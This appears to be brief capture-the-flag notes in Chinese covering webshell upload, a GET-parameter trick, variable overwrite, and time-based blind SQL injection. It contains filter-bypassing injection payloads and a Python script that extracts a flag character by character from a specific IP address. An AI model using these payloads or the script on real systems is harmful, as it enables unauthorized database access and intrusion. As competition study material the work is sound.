check

文件上传

上传一句话木马

蚁剑连接

根目录flag

GET传参

?text=data:text/plain,welcome to the beijing&file=/flag&password=r

变量覆盖

将flag的值赋给a 再让flag=a 输出flag

？a=flag&flag=a

sql

时间盲注查询数据库

id=1'/**/anandd/**/if((ascii(substr((select/**/database()),1,1)))>1,sleep(3),1)#

1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(2),1)#

1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(3),1)#

?id=1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1))),{},sleep(3),1)#

import requests
import time

url = "http://43.143.155.90:9801/index.php"
flag = ""

for i in range(1, 50):
    for j in range(96, 127):
        a = ("1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1)))={}"
             ",sleep(3),1)#").format(i, j)
        data = {'id': a}
        print(data)

        start_time = time.time()
        r = requests.post(url=url, data=data)
        end_time = time.time()
        sec = end_time - start_time
        time.sleep(1)
        if sec >= 2:
            flag = flag + chr(j)
            print(flag)
            break

ssti

反序列化